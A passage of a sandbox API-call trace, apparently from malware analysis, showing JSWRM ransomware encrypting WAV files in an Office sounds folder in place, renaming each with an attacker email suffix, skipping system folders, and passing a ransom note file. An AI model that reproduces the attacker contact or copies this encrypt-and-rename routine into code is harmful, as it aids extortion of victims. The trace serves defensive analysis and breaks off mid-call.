[0130.780] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=30816) returned 1 [0130.780] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.780] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7860, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x7860, lpOverlapped=0x0) returned 1 [0130.784] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.784] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x7860, lpOverlapped=0x0) returned 1 [0130.784] CloseHandle (hObject=0x338) returned 1 [0130.784] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\GIGGLE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\giggle.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\GIGGLE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\giggle.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.785] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19758458, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38ea, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="HICCUP.WAV", cAlternateFileName="")) returned 1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2=".") returned 1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="..") returned 1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="...") returned 1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="windows") returned -1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="recovery") returned -1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="perflogs") returned -1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="documents and settings") returned 1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="system volume information") returned -1 [0130.785] lstrcmpiW (lpString1="HICCUP.WAV", lpString2="msocache") returned -1 [0130.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HICCUP.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HICCUP.WAV", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HICCUP.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HICCUP.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HICCUP.WAV", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HICCUP.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\HICCUP.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\hiccup.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.787] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=14570) returned 1 [0130.787] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.787] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x38e0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x38e0, lpOverlapped=0x0) returned 1 [0130.789] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.789] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x38e0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x38e0, lpOverlapped=0x0) returned 1 [0130.790] CloseHandle (hObject=0x338) returned 1 [0130.790] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\HICCUP.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\hiccup.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\HICCUP.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\hiccup.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.791] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x449bc0cd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x449bc0cd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x449bc0cd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.791] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.791] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b00, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="MMHMM.WAV", cAlternateFileName="")) returned 1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2=".") returned 1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="..") returned 1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="...") returned 1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="windows") returned -1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="recovery") returned -1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="perflogs") returned -1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="documents and settings") returned 1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="system volume information") returned -1 [0130.791] lstrcmpiW (lpString1="MMHMM.WAV", lpString2="msocache") returned -1 [0130.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMHMM.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMHMM.WAV", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MMHMM.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMHMM.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMHMM.WAV", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MMHMM.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\MMHMM.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\mmhmm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.793] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=15104) returned 1 [0130.793] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.793] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3b00, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x3b00, lpOverlapped=0x0) returned 1 [0130.795] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.795] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3b00, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x3b00, lpOverlapped=0x0) returned 1 [0130.796] CloseHandle (hObject=0x338) returned 1 [0130.796] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\MMHMM.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\mmhmm.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\MMHMM.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\mmhmm.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.797] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c84, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="SNEEZE.WAV", cAlternateFileName="")) returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2=".") returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="..") returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="...") returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="windows") returned -1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="recovery") returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="perflogs") returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="documents and settings") returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="system volume information") returned -1 [0130.797] lstrcmpiW (lpString1="SNEEZE.WAV", lpString2="msocache") returned 1 [0130.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNEEZE.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNEEZE.WAV", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SNEEZE.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNEEZE.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNEEZE.WAV", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SNEEZE.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\SNEEZE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\sneeze.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.798] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=40068) returned 1 [0130.798] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.798] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9c80, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x9c80, lpOverlapped=0x0) returned 1 [0130.804] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.804] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9c80, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x9c80, lpOverlapped=0x0) returned 1 [0130.805] CloseHandle (hObject=0x338) returned 1 [0130.805] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\SNEEZE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\sneeze.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\SNEEZE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\sneeze.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.806] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d36, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="THROAT.WAV", cAlternateFileName="")) returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2=".") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="..") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="...") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="windows") returned -1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="recovery") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="perflogs") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="documents and settings") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="system volume information") returned 1 [0130.806] lstrcmpiW (lpString1="THROAT.WAV", lpString2="msocache") returned 1 [0130.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THROAT.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THROAT.WAV", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THROAT.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THROAT.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THROAT.WAV", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THROAT.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\THROAT.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\throat.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.807] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=36150) returned 1 [0130.807] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.807] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8d30, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x8d30, lpOverlapped=0x0) returned 1 [0130.811] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.811] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8d30, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x8d30, lpOverlapped=0x0) returned 1 [0130.811] CloseHandle (hObject=0x338) returned 1 [0130.811] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\THROAT.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\throat.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\THROAT.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\throat.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.812] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7302, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="Whistling.wav", cAlternateFileName="WHISTL~1.WAV")) returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2=".") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="..") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="...") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="windows") returned -1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="recovery") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="perflogs") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="documents and settings") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="$RECYCLE.BIN") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="system volume information") returned 1 [0130.812] lstrcmpiW (lpString1="Whistling.wav", lpString2="msocache") returned 1 [0130.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Whistling.wav", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Whistling.wav", cchWideChar=13, lpMultiByteStr=0x345e508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Whistling.wav", lpUsedDefaultChar=0x0) returned 13 [0130.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Whistling.wav", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Whistling.wav", cchWideChar=13, lpMultiByteStr=0x345e4d8, 